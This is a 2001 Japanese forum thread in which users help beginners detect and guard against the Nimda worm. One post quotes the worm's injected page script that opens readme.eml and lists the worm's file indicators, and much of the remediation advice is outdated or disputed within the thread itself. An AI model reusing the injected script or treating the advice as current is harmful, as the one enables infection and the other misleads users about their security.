http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000321.htm

W32.Nimda.A@mmについてあれこれ
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000323.htm

ここが一番うじゃうじゃ情報集まってる、
http://keisui.com/GIGAZINE/cgi-bin/news/html/newsbav.html
185 :01/09/19 14:26 ID:B378IXbs
ドリキャスはどうなの?
186 :01/09/19 14:26 ID:3sY7l68o
>>178
そんなの知らなくていいよ。
この事件でmsnは厨房管理さらけだしたんだから。
どうせ、バグで脆弱だったんだろ。
187 :01/09/19 14:26 ID:e04NWwrc
ネスケはマヂで使い物にならん
188 :01/09/19 14:27 ID:AgNUQR6A
なんか2chの読み込み重いんだけど
こいつの影響もあるのかな
189てろりん:01/09/19 14:27 ID:YO8.LQOA
たびたびすみません・・・。
設定ファイルでWAVEmixっていうのがあるんですが、これは感染しているんでしょうか?
190nanasisan:01/09/19 14:28 ID:KSWVQD0E
>>185
Dreamcastの人はプログラムが動作できる環境ではないので問題は発生しません。
191NeWS SITEs ◆NeWSITEs :01/09/19 14:28 ID:JSlZ/h2Q
>>174
メーカー製のマシンは、初期ページがメーカー向いています。
192 :01/09/19 14:29 ID:1L5pANOU
>>185
 ガイシュツ。
 200ないスレなんだからとりあえず目を通す努力してくれ。
 説明面倒だからとりあえず安心しとき。
193厨房:01/09/19 14:30 ID:I3H4ktQc
>>191
あなたのレスがデジャブだ・・・
ゴミレスすまん
194 :01/09/19 14:31 ID:M9gsgZs2
質問!OSが借り物の場合、ダウンしたらヤバイですか?
195nanasisan:01/09/19 14:32 ID:KSWVQD0E
>>189
それはウイルスとは無関係。必要なければ消してしまってもかまわないが、
何かのアプリケーション設定が消えてしまうかもしれないので注意。
196 :01/09/19 14:33 ID:/LsUGfPI
>>194
ヤヴァイ以前の問題。
197 :01/09/19 14:33 ID:1L5pANOU
>>189
 とりあえずここではWAVEから離れんしゃい。
 WAV関連はメールの添付ファイル以外は今回関係ないよ
198 :01/09/19 14:33 ID:peq79vYs
で、結局検索でreadme.exeがあったら感染なのか?
199 :01/09/19 14:35 ID:N4U8iOCw
>>189
そんなに心配なら↓をお気に入りに入れておくよろし
http://www.trendmicro.co.jp/hcall/scan.htm
200てろりん:01/09/19 14:35 ID:YO8.LQOA
>>195
ありがとう!安心しました〜。
これからもっと勉強をして詳しくなります。お世話さまでした!
201 :01/09/19 14:38 ID:1L5pANOU
>>198
 キャッシュにあるだけかもしれないから、それで確定じゃないよ。
 *.emlが大量にHITしたら確定って考えていいと思う。
202 :01/09/19 14:41 ID:peq79vYs
>201
さんくす、2個しか*.emlは見つからなかった
感染はしていないみたいだ
203 :01/09/19 14:44 ID:NKuHDtEA
IE5.0、CPUはペンティアム166、メモリ96。
この非力なパソコンにはどのIEを入れればいいですか?
204 :01/09/19 14:44 ID:/LsUGfPI
ageだ、ホレ
205どうして??:01/09/19 14:45 ID:Dllf4gis
SP2をインストール&再起動し、バージョンがSP2になったのに
Temporary Internet Filesを検索したら、[email protected]というのが出てきました。
これは、まだ感染しているということですか?
206_:01/09/19 14:45 ID:xHvJLsz6
うちのパソコンにもウイルスいるよ。
名前はVBS.Haptime.A@mmつて奴。
いい感じに共存してるけどそろそろ手を切りたいな〜。
誰か教えてください(泣
207あんま変わらんけど:01/09/19 14:46 ID:1L5pANOU
状況報告ver1.03(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
 →java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。

LANによる感染
 社内に一人でも対策してないひとがいてノーパスとかにしていた場合
 LANの共有フォルダを使っても自己増殖する。

感染鯖
 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
208続き:01/09/19 14:47 ID:1L5pANOU
状況報告ver1.03(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
 それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。

 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
209名無しさん:01/09/19 14:50 ID:ffTHrls6
IE4のSP2を使っているのですが、安全ですか?
HDの余りも限られているし、OSも98(SEではない)
なので、できればIE5にはしたくないのですが。
210 :01/09/19 14:50 ID:bCsgO3Gg
>>206
共存ってなんか笑えるね
211 :01/09/19 14:50 ID:dvZoh28Q
>2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT

スタートから検索を選んでCドライブを検索するだけでいいのですか?
212フォローです:01/09/19 14:51 ID:N4U8iOCw
>>208
そこから、直リンできんって・・・
ネスケの人もいるんだから
http://www.trendmicro.co.jp/hcall/scan.htm
にしときんさい
213 :01/09/19 14:52 ID:1L5pANOU
>>209
 即死はないけど、直接ウイルスのファイルを踏まされると
DLダイアログが開くから拒否して
214 :01/09/19 14:53 ID:1L5pANOU
>>212
 あ、悪いっす&了解。
 変更しときます。
215 :01/09/19 14:54 ID:tLF66/ns
ぷくくくく、ぎゃははは。
ブラウザをあっぷでーとしたらウイルスが消えると思ってる天才くんがいるようだね。あはっはははは。最高!ネタだろ?
216209:01/09/19 14:55 ID:ffTHrls6
>>213
どうもありがとうございます。
気をつけますです。
217 :01/09/19 14:56 ID:bCsgO3Gg
今さっき1時間かけて5.0→5.5SP2に変えたけど
軽くなったよ
嬉しい
218.:01/09/19 14:57 ID:72sY8luc
>>215

何か?
219 :01/09/19 14:57 ID:1L5pANOU
>>211
 DL先の設定をDドライブとかにわざわざしていないなら、CだけでOK。
220_:01/09/19 14:58 ID:xHvJLsz6
>うちのパソコンにもウイルスいるよ。
名前はVBS.Haptime.A@mmつて奴。
いい感じに共存してるけどそろそろ手を切りたいな〜。
誰か教えてください(泣

いや、マジで。
検索したら殺リ方のってたけどよくわからんです。
221 :01/09/19 14:58 ID:dvZoh28Q
>>219
ありがとうございます
222 :01/09/19 15:03 ID:/LsUGfPI
>>220
さっさとウイルス対策ソフト買え・・・
(鉄壁とマカフィー以外の)
223 :01/09/19 15:04 ID:1L5pANOU
>>220
 詳しくないならかえってまずいことになるので自分で直接ファイルを
いじらないでとりあえず、駆除できるウイルススキャンソフト購入するか、
OSをバックアップorセットアップから復帰しなおすしかないね。
 今後もウイルスもらうこともあるかもしれないから、
ウイルススキャンソフト買う方がいろいろとお勧め。
224どうして??:01/09/19 15:05 ID:Dllf4gis
>>215
君はここのスレの題名が読めないのかしら?
スーパー初心者のためのMSNウィルスすれ。
あ、漢字読めないの?
すーぱーしょしんしゃのためのえむえすえぬすれ。
225_:01/09/19 15:05 ID:zYHPZHs6
とりあえず。みんな落ち着け。

今回のウイルスはそんなに怖くないぞ。

スクリプトの実行さえ切っておけば、とりあえずWeb閲覧だけでは
感染しないから。

慌ててIEのバージョンあげなくても大丈夫だ。
226 :01/09/19 15:06 ID:/LsUGfPI
age
227 :01/09/19 15:06 ID:sEBavJI2
msnのサーバがやられたのですか?
んなら、hotmailのメールは、
それに感染しているということもありえるのですか?
228 :01/09/19 15:07 ID:LxtlZGLg
Internet Explorer 6 ならいいの?
229 :01/09/19 15:07 ID:OXw6lVdQ
俺的にはサーカムのほうがいやだったけどね。
再起動できなくなったし。
230もふもふ:01/09/19 15:07 ID:5mJPrSNQ
msn訴えると僕は金持ちになれましゅか?
231 :01/09/19 15:09 ID:JSlZ/h2Q
>>224

それだと、 msn の質問ばかりになるんだろうな・・・
232 :01/09/19 15:09 ID:7112tIoU
>>230
アメリカで訴えろ!
懲罰的損害賠償(゚д゚)ウマーだ
233 :01/09/19 15:10 ID:N4U8iOCw
>>215
自分の作ったスレ↓が人気無いからここに来たんだろ(ワラ
http://news.2ch.net/test/read.cgi?bbs=news&key=1000876455
234 :01/09/19 15:10 ID:ied54yb2
★☆「ノーブル・テッシー」(高貴なテッシー)作戦決行中!!☆★
21世紀偉人投票所:http://isweb35.infoseek.co.jp/diary/kouki711/
235 :01/09/19 15:12 ID:gBmvSPfc
何か朝起きてPC起動したら、いつもより遅いんですけど、
それにネットなんか滅茶苦茶遅いし。。。
236220だけど・・・:01/09/19 15:12 ID:xHvJLsz6
ノートンつかってるんだけど、
VBSってのがいるよ!!と警告されて
完全ウイルススキャンしたんだけど引っかかってくれないのです。
なんかよくわかんないんだけど、設定とかが悪いのかな?
237 :01/09/19 15:12 ID:JgAOGVbo
ファイルのダウンードってウインドウが出たんだけど??
238はあ?:01/09/19 15:13 ID:gvewi47.
MSNスレじゃねーわ!!
孫の代まで氏ね!
239 :01/09/19 15:13 ID:7jAGOnQE
SP2のインストールめんどくせぇや
ジャバスクリプトきっとけば大丈夫?
240 :01/09/19 15:14 ID:md1OdAUE
スクリプトの実行を切るってどうやるの?
241nanasisan:01/09/19 15:14 ID:KSWVQD0E
>>237
それはMSNウイルス対応済みのIEでMSNウイルスに感染したサイトを開いたときに
表示される。ダウンロードを始めてもいないのにウインドウが表示されるようなら、
キャンセルを押して閉じると良い。
242 :01/09/19 15:17 ID:/LsUGfPI
>>235
そうです。このウィルスのせいでネットは大混乱、テレホタイムでもないのに激重です。
243IE4だが・・・:01/09/19 15:19 ID:zYHPZHs6
>>240
デスクトップのIEのアイコンを右クリック

プロパティを選択

表示された画面の「セキュリティ」TABを選択

セキュリティレベルの「カスタム」を選択し「設定ボタン」を押す

下のほうにスクリプトの設定があるから「有効にする」を「無効にする」に変更

IEのバージョンによっては設定の場所が違うかも。

とりあえず、スクリプトを切れば、Webからの感染は防げる。
244cjd++:01/09/19 15:20 ID:KNIHNtEg
2chにも初心者がたくさんきているのだと知った
今日この頃。
245 :01/09/19 15:21 ID:oestFoJ6
Internet Explorer 6 にアップデートしたんだが
大丈夫ですか?
246 :01/09/19 15:21 ID:md1OdAUE
>>243
マジありがとうございます!
247235:01/09/19 15:22 ID:gBmvSPfc
>>242
なんだ、ビクーリした!自分も感染してるんじゃないかと思ったよ。
248 :01/09/19 15:22 ID:/LsUGfPI
age
249 :01/09/19 15:23 ID:/LsUGfPI
>>248 鬱氏。age
250nanasisan:01/09/19 15:23 ID:KSWVQD0E
>>245
いちおう正式公開されたので大丈夫のはず。
ただ別のウイルス(ワーム)に引っかかる可能性が捨てきれないので、
これからも随時アップデート情報を追いかけておきましょう。
251 :01/09/19 15:24 ID:JgAOGVbo
スレッド一覧クリックしたら、
文字化けしたぞ!!!!
おれだけか???
252スーパー初心者@泣きモード:01/09/19 15:25 ID:YmFZnDEE
どうにかこうにかやってみたのですが、
45分ほどかかるというので、ちょっと目を離していたら
「(なんたらかんたら)へのアクセスはできませんでした」とかって
なっててわけがわかりません。

もう一度このスレをゆっくり読んでやり直そうと思ったら
(たぶん、途中でダメだったのだろう、と思って)
今度は選択できる一覧からPS2がなくて・・・・

で、インストールの履歴を見たら
『 Internet Explorer 5.5 Service Pack 2 と
 インターネット ツール - version 5,50,4807,2300 - の
 インストールが完了しました。
 13:39:59 2001年9月19日 : 4795 』

となってるんです。
これはできてるってことですか?
私のPCはもう大丈夫ですか?
どなたか教えてください。
253 :01/09/19 15:26 ID:17t7GA.M
ワイドショーで取り上げられてた
W23 NIMDA ってウイルスがこれか?
世界大戦3 行政機関って意味だとかいって
馬鹿が持ち上げてたぞ。
254おいおい:01/09/19 15:27 ID:9ejiBGFY
おいどっかのプルトニウムとか言うところのページに逝ったら
感染したよ ノートンに検索させたらヒットした
IE6.0は駄目ダヨい
255nanasisan:01/09/19 15:27 ID:KSWVQD0E
>>252
Windows Updateでそれが表示されていると言うことは、IEのインストール自体は
成功したと考えて良いでしょう。おそらくはなにか別のソフトウエアの
インストールに失敗したのでは?>「(なんたらかんたら)へのアクセスはできませんでした」
256 :01/09/19 15:28 ID:/LsUGfPI
>>254
デスクトップに新しくアイコンができてるはずだからクリックしてみて。
「Windows Update セットアップの再開」 だったかな?
257 :01/09/19 15:29 ID:e04NWwrc
>>252
IEのヘルプ→バージョン情報みてみそ。
258nanasisan:01/09/19 15:30 ID:KSWVQD0E
>>254
それは単にIEのキャッシュにヒットしただけでは?
実行しなければ感染はしないよ。Nortonだと実行前に警告が上がってきて、
そこで「アクセス拒否」(だったかな?)を押せば実行しなくて済むはず。
259 :01/09/19 15:31 ID:.FNeXM3I
IEアップデートできません。
「タスクスケジューラの署名を確認しています」のところで、
DL失敗になります。何回やっても同じです。
何故でしょう?
260 :01/09/19 15:31 ID:PUKw48AA
うちには毎週日曜に必ずウィルスが送られてくるよ
まじで相手を殺してー
261 :01/09/19 15:32 ID:fAFEbzjQ
ザ・ワイドでやるぞ
262252:01/09/19 15:32 ID:YmFZnDEE
>255さん
レスありがとうございます。
とりあえずPS2はうまくいってるのですね。安心しました。
本当に本当に本当にどうもありがとうございます。

今日1番にアクセスしたのが2chでよかったです。
いつもいくどの板のトップにも緊急のお知らせがあったし、
この板と、特にこのスレの皆さんには感謝しています。
本当にありがとう。
263nanasisan:01/09/19 15:33 ID:KSWVQD0E
>>259
IE自体がアップデートできていれば*今回のウイルスについては*問題ないはず。
ヘルプ→バージョン情報で "5.50.4807.2300" になっていればOK。
264 :01/09/19 15:33 ID:keGDeXIo
IE6.0はホントにだめなのでしょうか?
265252:01/09/19 15:33 ID:YmFZnDEE
>257さん
ありがとうございます。
見てみます。
266 :01/09/19 15:36 ID:AmEHqk4c
>>254
 インターネットオプションの全般にある一時ファイル空にしてもう一回
スキャンしてみて。
 よければその結果も教えて
267 :01/09/19 15:38 ID:JSlZ/h2Q
>>255
IE UPDATE が途中で止まると、「(なんたらかんたら)へのアクセスはできませんでした」 って
でないっけ?

まぁその場合にはデスクトップに「Windows Update セットアップの再開」 っていうアイコンが
できるんだけども。
268nanasisan:01/09/19 15:38 ID:KSWVQD0E
>>264
手元で試しているが問題ない。ただ、IEのバージョンが何であれ
感染したサイトに行くと「ダウンロードしますか?」が出てくるので
キャンセルすると良い。ちなみにこれはIEでなくてmozillaでもNetscape
でも出る。

IEの未対応バージョンだと「ダウンロードしますか?」が出ないでいきなり
実行してしまうので問題ってこと。
269252:01/09/19 15:39 ID:YmFZnDEE
>257さん
「更新バージョン:;SP2;」となっていました。
大丈夫そうです。ほっとしました。
親切にありがとうございました。
本当に親切な皆さん、ありがとうございます。
270264:01/09/19 15:41 ID:keGDeXIo
>>268
ありがとう!
271 :01/09/19 15:42 ID:AmEHqk4c
既に感染していたらアップデートしても
意味ないからね。
 ちゃんと感染の有無は確認してね>初心者ALL
272259:01/09/19 15:43 ID:.FNeXM3I
>>263
いえ、セットアップの再開になってしまうんです。
何度やってもダメです。
273 :01/09/19 15:43 ID:JSlZ/h2Q
274 :01/09/19 15:43 ID:9ejiBGFY
IE6.0でセキュリティ関係全部ONだと感染するよ
というか感染した
鬱だ 氏脳
275 :01/09/19 15:45 ID:keGDeXIo
じゃあやっぱり
IE5.5のほうがいいのでしょうか?
276 :01/09/19 15:46 ID:ilV2hG2w
>>271
どうやって感染を確かめるのでしょうか?
教えてくださいまし。
277 :01/09/19 15:46 ID:AmEHqk4c
>>274
 そりゃ、無条件で全てを受け入れるってことだから
感染するよ。
 DLとかactiveXとかのやばい物は表を歩く時でも
ダイアログ出すようにしないと
278 :01/09/19 15:46 ID:zYHPZHs6
>>274
マジ?
それは新情報だよ?
279 :01/09/19 15:47 ID:LRM32VyM
>272
Windows Update はアンチウィルスソフトを無効にしとかないと失敗することがあるよ
280ななし:01/09/19 15:48 ID:exibgqlk
参考になった。良スレであった。
281276:01/09/19 15:49 ID:ilV2hG2w
過去レス見たのでわかりました。
感染してませんでした。
282 :01/09/19 15:51 ID:YhkDggS.
IE6入れちったよ
283ぺ ◆lPYiMAEY :01/09/19 15:52 ID:.iBHXJik

Windows Updateに繋ぐときは「Javaの許可」で「安全性-高」にしてたら
正常に表示されないことがある。「安全性-低」に設定すると大丈夫。
284ナナシサソ:01/09/19 15:52 ID:uy8Pfu/w
現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
 MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
285W32ニダ:01/09/19 15:54 ID:gQ3gg2K.
W32ニダ
286 :01/09/19 15:56 ID:oestFoJ6
JavaScriptの切り方教えて下さい。
287 :01/09/19 15:56 ID:gsbkGkZw
http://www.chunichi.co.jp/
対策方法はここを見れば全てわかる
288 :01/09/19 15:57 ID:zYHPZHs6
>287は感染サイト!!!

叩かないように!
289 :01/09/19 15:57 ID:rJO4rUQE
>286
243を見れ
290こぴぺ:01/09/19 16:00 ID:oaR/VUnY
930 :  :01/09/19 15:58 ID:AmEHqk4c
>>923
 やじるし通りに手順を踏んで、そこにラジオ(チェックボックスみたいの)がいっぱいあるから
そこで『java』って書いてある全部と、『ダウンロード』『ファイルのダウンロード』って項目を
全部不許可。
 事態が収束したら、セキュリティー中でOKだからとりあえず今はこうしといて。
291 :01/09/19 16:01 ID:ecPQDk4k
OutlookExpressで、メールおくったことあるのに、
emlファイルが全くないのは大丈夫なの?
292 :01/09/19 16:01 ID:FE2elL86
>感染鯖
> ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
>"resizable=no,top=6000,left=6000")</script></html>
>が追加される。

JavaScript(JScript)で実行されてるのに
JAVAの設定切って意味あんの?
293にゃ:01/09/19 16:02 ID:IHdNh/Qs
だめだー、IEアップデートしたくてもできない
ダイヤルアップだから途中で回線が切れてしまう

とりあえずネットスケープ使ってるけどそれで大丈夫でしょうか?
294 :01/09/19 16:02 ID:g6whrLsI
ウィルス流通の温床と化してるアウトルック(エクスプレス)、何度も
散々痛い目見てるのに何故に使いつづけるかね…。ヴァカか?
295 :01/09/19 16:02 ID:QYFPL2LU
IE5.01SP2だけど念の為、と思って、HDを「readme.exe」で検索してみたら・・・
「w32_nimda」とかそのまんまのファイル名とかが5〜6個出てきた!!


・・・でも良く見たらさっき見たサイトのTemporary Internet Filesだった。
296nanasisan:01/09/19 16:03 ID:KSWVQD0E
>>291
emlはメール単体(1通分)のファイルです。
Outlook Expressでは、その中でメールをやり取りしているだけではmbxかdbxの
拡張子を持ったファイルに複数個のメールがいっしょに入ります。

従って、Outlook Expressでメール送受信をしているだけならemlは出てきません。
297 :01/09/19 16:04 ID:QpsLGwxM
MEでIE5.5なんですが、どうしたらいいの
298 :01/09/19 16:04 ID:ALUfLgrg
現時点で感染してなくてIEをSP2にアップしてJAVAとか切ったらもう安全?
実行ファイルを押さない限り安全?
299 :01/09/19 16:05 ID:oaR/VUnY
>>294
おすすめのメーラーってなに?
Netscape Mail 以外で。
300 :01/09/19 16:05 ID:AmEHqk4c
>>292
 いやさ、元々初心者用に書いたから、
JAVAとjavaの違い説明するの面倒だったのよ。
 しゃーねーなって流しといて(w
301nanasisan:01/09/19 16:06 ID:KSWVQD0E
>>298
javascriptを切っておけば今回の問題についてはとりあえず安全。
あと、知らないファイルについて「ダウンロードしますか?」と聞かれた場合は
素直に「キャンセル」を押しましょう。
302ういんどうずうんこ:01/09/19 16:08 ID:tLF66/ns
303 :01/09/19 16:08 ID:FE2elL86
>>300
>JAVAとjavaの違い

お前もわかってねーだろ。
304 :01/09/19 16:08 ID:7jAGOnQE
重くてやってらんねぇ
本屋行ってくる
305dghjk:01/09/19 16:09 ID:gQ3gg2K.
>>294
わざわざ入れんのめんどくせえ。
Outlook Expressアンインストールできないし。
306名無し:01/09/19 16:09 ID:VXd4MTO.
IE5.0なんですけど下のどれを入れたほうが良いと思います

Internet Explorer 5.5 Service Pack 2 とインターネット ツール

Internet Explorer 5.01 Service Pack 2
307:01/09/19 16:09 ID:Jr.kW5wI
どこで検索すればいいのかわかりません!
検索ってアウトルックで検索?
308 :01/09/19 16:10 ID:ALUfLgrg
>301
サンクスコ。あとは自己防衛でだいじょぶなんだね。
JAVAとかは普段から全部切ってるから安心だよ。
アクティブスクリプトを切るとバナー広告とかもでてこなくなるから便利だよな。
309ぺ ◆lPYiMAEY :01/09/19 16:11 ID:.iBHXJik
>293
IEのツール(T)→インターネットオプションから、

「接続」タブ
→「設定」ボタン
→「ダイヤルアップの設定」の「プロパティ」
→「ダイヤル」タブ
→「アイドル時の切断」チェックを外す

これで回線は途中で切れないようになります。
デフォルトでは「20分たったら切断」となってるので
これが原因かと。

違ってたらスマソ。
310 :01/09/19 16:11 ID:g6whrLsI
>>299
Becky!InternetMail
シェアウェア4000円とちと高いけど、複数アカウントでも使いやすい。

NetscapeMailは以前使ってたけど、複数のアカウントがまともに扱えなかったからねぇ。
311 :01/09/19 16:11 ID:rJO4rUQE
>307
Windowsのメニューから検索→ファイルやフォルダを選んで探したいものを入力する
312nanasisan:01/09/19 16:11 ID:KSWVQD0E
>>307
スタートメニューの「検索」→「ファイルやフォルダ」
313 :01/09/19 16:12 ID:8hysENhc
アクティブXは有効でもいいんですか?
314名無しさん23:01/09/19 16:13 ID:ugL4CmUM
ネスケで良かった。ベキーで良かった。
315  :01/09/19 16:13 ID:XmuT0s7.
IE5.01SP2だと駄目なの?
IE5.5SP2かIE6にしなきゃ駄目ってこと?
316 :01/09/19 16:13 ID:LZsmlQMs
マックでよかったヽ(´ー`)ノ
317ぺ ◆lPYiMAEY :01/09/19 16:14 ID:.iBHXJik
>313
ActiveXのチェックボタンは、全て「無効」または
「ダイアログ表示」に設定しておくのがよろしい。
318PC厨房:01/09/19 16:14 ID:6Ah5JbSc
     _____
    /_      |
    /. \ ̄ ̄ ̄ ̄|
  /  /  ― ― |
  |  /    -  - |
  ||| (6      > |
 | | |     ┏━┓|   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| | | |     ┃─┃|  < 正直、どんな被害が予想されるの?恐い・・・
|| | | |  \ ┃  ┃/    \________
| || | |    ̄  ̄|
319 :01/09/19 16:14 ID:oaR/VUnY
>>310
ありがと。
移行してもいいんだけど、一番気になるのは、Outlookで大量にたまった
過去メールもちゃんと移行できるかってことなんだよね。

以前もフリーソフトなんかをつかって移行をこころみたけど、結局うまく
いかなくて諦めた。
320鬼畜 ver7.74:01/09/19 16:14 ID:st2sa52k
林檎って楽だなーーーーー。
これを機会に林檎使いが増え・・る訳ないか・・。
321ななし:01/09/19 16:15 ID:CcUhePas
ネスケメール、今では複数のアカウントに対応してるぜ。
322 :01/09/19 16:15 ID:SCBAE6rs
X68000でよかったヽ(´ー`)ノ
323 :01/09/19 16:15 ID:AmEHqk4c
303
javascript=Netscapeが考えたHTML埋め込み型script言語
 元々はLiveScript。
JAVA=Sun Microsystemsが作ったJAVA言語

 で確かあってるはずだが……
324初心者:01/09/19 16:19 ID:VXd4MTO.
JAVAを無効にするにはどうしたらいいの?
325七資産:01/09/19 16:19 ID:sChLgbv6
友人から対策でこれ入れろってメール来たが、これって今回とは関係ないパッチだよな?効果あんのか…誰か教えてくれー。
http://www.microsoft.com/japan/technet/security/SecFaq.asp?sec_cd=ms01-020
326 :01/09/19 16:19 ID:SCBAE6rs
>>319
できるよ。詳しくはここ見てちょ
http://www.becky-users.net/faq/contents/01003.html
327 :01/09/19 16:20 ID:4YsZA8ZQ
うーん、よく分からん。
328nanasisan:01/09/19 16:20 ID:KSWVQD0E
>>325
ここを見ると良いぞ。今回の件限定だけど。
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
329 :01/09/19 16:22 ID:SCBAE6rs
>>321
できるにはできるんだけど、いちいち別のプロファイルで再起動せねばならないのでは
使い物にならんということで…。

Becky!みたく一元的に複数アカウントの管理ができないとどうもね…。
330315:01/09/19 16:22 ID:XmuT0s7.
ようはIE5以上のSP2にして、readme.*みたいなファイルは
知らんぷりすれってこと?
331 :01/09/19 16:23 ID:kduBvuoU
Service Pack 2をインストール
ってどうやってするんですか?
332 :01/09/19 16:23 ID:gsbkGkZw
http://www.ygu.ac.jp/guide/hougakuseiji/index.html
対策ソフト配布開始した模様
333nanasisan:01/09/19 16:24 ID:KSWVQD0E
>>330
そういうことです。今回の件に限ったことではないですが、少しでも「怪しい」と
思ったファイルは開かないのが吉です。IE5でSP2未満だと「開くか開かないか」
さえ聞いてこないのでこのスレで問題になっているのですが。
334 :01/09/19 16:24 ID:oaR/VUnY
>>326
ありがと。
mboxに直してくれるんだ。安心安心。
ちょっと試してみよ。
335 :01/09/19 16:25 ID:AvCgHDsA
>>333
怪しいと思わずにうっかり開いたらどうなるんですか?
336七資産:01/09/19 16:25 ID:sChLgbv6
>>328
うーん、なんか良くわからんが、HTMLメールに仕込まれてた場合はこれで回避できるって事?
337 :01/09/19 16:26 ID:zYHPZHs6
>>335
あぼーんです。
338nanasisan:01/09/19 16:27 ID:KSWVQD0E
>>335
ウイルスチェックのソフトウエアが入っていて、かつ最新のパターンファイルに
なっていればウイルスチェックのソフトウエアで防御できる。
ただしウイルスチェック側で「開こうとしたファイル全てに対してウイルスを
チェックする」設定にしておかないと意味無し。

そうでない場合は感染する。
339 :01/09/19 16:28 ID:BwXoFOdw
SP2ダウンロードしてるんだけど
残り時間15時間12分、、、マジっすか?
340nanasisan:01/09/19 16:29 ID:KSWVQD0E
>>339
みんな一斉にダウンロードしようとしてるから遅いんだと思う。
341 :01/09/19 16:29 ID:RmCCQsso
IE5.0なんですけど、IE5.01のSP2っていうのを
DLしてもいいんでしょうか?
342 :01/09/19 16:29 ID:eovHWsSY
IE5.5SP一分ぐらいで落とせたんですけど、これでいいんですか?
343_:01/09/19 16:29 ID:h2Phf0JE
昨夜、調べ物してたら、QuickTimeの「〇〇を実行するには〇〇のプログラム
をDLしないといけません。ダウンロードしますか?」と出たので、しないを
押したらブラウザが強制終了。
その後も別のサイトでそのダイアログ?が立ち上がったので、しつこいなぁと
思いつつ落としたのだが、その後またもやIEが強制終了。
今まで、QuickTime関連のダイアログなんか起動したことがなかったので変な感じ。

まさかなぁとは思うのだが…。
自宅はWin2000でIE5.5SP1…ヤバイ…ヤバすぎ。
コードレッド対策のときに、コードレッド用のセキュリティホールのパッチは
あてたのだが…意味無し?

どうしよ…早く家に帰りたい…。
344 :01/09/19 16:30 ID:5KhGe4rU
漏れいまだにIE4.0
345 :01/09/19 16:30 ID:3L/GxfkM
俺IE6.0テスト版なんだけどテスト版でも大丈夫なんかいな?
346ななし:01/09/19 16:31 ID:CcUhePas
>>329
それがネスケ6(あれ、6.1だっけ?)からは同一プロファイルで
複数のアカウントに対応できるようになってんだな。
ちょっと感動した。
347 :01/09/19 16:31 ID:zYHPZHs6
>>339>>341

とりあえず、JavaScriptを切れば大丈夫だって。
JavaScriptの切り方は過去レス参照してね。

混んでるさなか、急いでDLする必要はない。
落ち着く事が第一です。
348nanasisan:01/09/19 16:31 ID:KSWVQD0E
>>345
何があるか解らない(無保証なのがテスト版)ので、念のためIE6正式版をインストールすると良い。
349あああ:01/09/19 16:31 ID:1SmjZecc
雑誌の付録で付いてるかな?
350 :01/09/19 16:32 ID:f7NLWTrQ
5.5のカスタマイズ版って書いてあるんだけど・・・
SP2ってどこでどうやって手に入れるの
351nanasisan:01/09/19 16:32 ID:KSWVQD0E
>>349
IE6は難しいが、5.5SP2なら探せばあるはず。
352342:01/09/19 16:32 ID:eovHWsSY
あ、SP2です。
353 :01/09/19 16:32 ID:0vW2CaDA
しかし今さらながら
なんでこんなことをするんだろうなぁ…
354341:01/09/19 16:32 ID:RmCCQsso
>>347
ありがとう。
355 :01/09/19 16:33 ID:UjJVOzgA
>>339
今、パソコン3台にIE5.5SP2をDLしたけどISDNで1台50分
くらいだったよ
356349:01/09/19 16:34 ID:1SmjZecc
>>351
ありがとう、探してみます。
357広末涼子(本物):01/09/19 16:34 ID:lXFBnjJc
SP2で
「ダウンロードしますか?」ダイアログを
キャンセルしても、
しっかりreadme.exe、readme.emlが出来ているはず。
削除々々!
358 :01/09/19 16:35 ID:3L/GxfkM
俺のPCのウイルススキャン用ソフト
McAfee VirusScan Schedular 4.0.3a
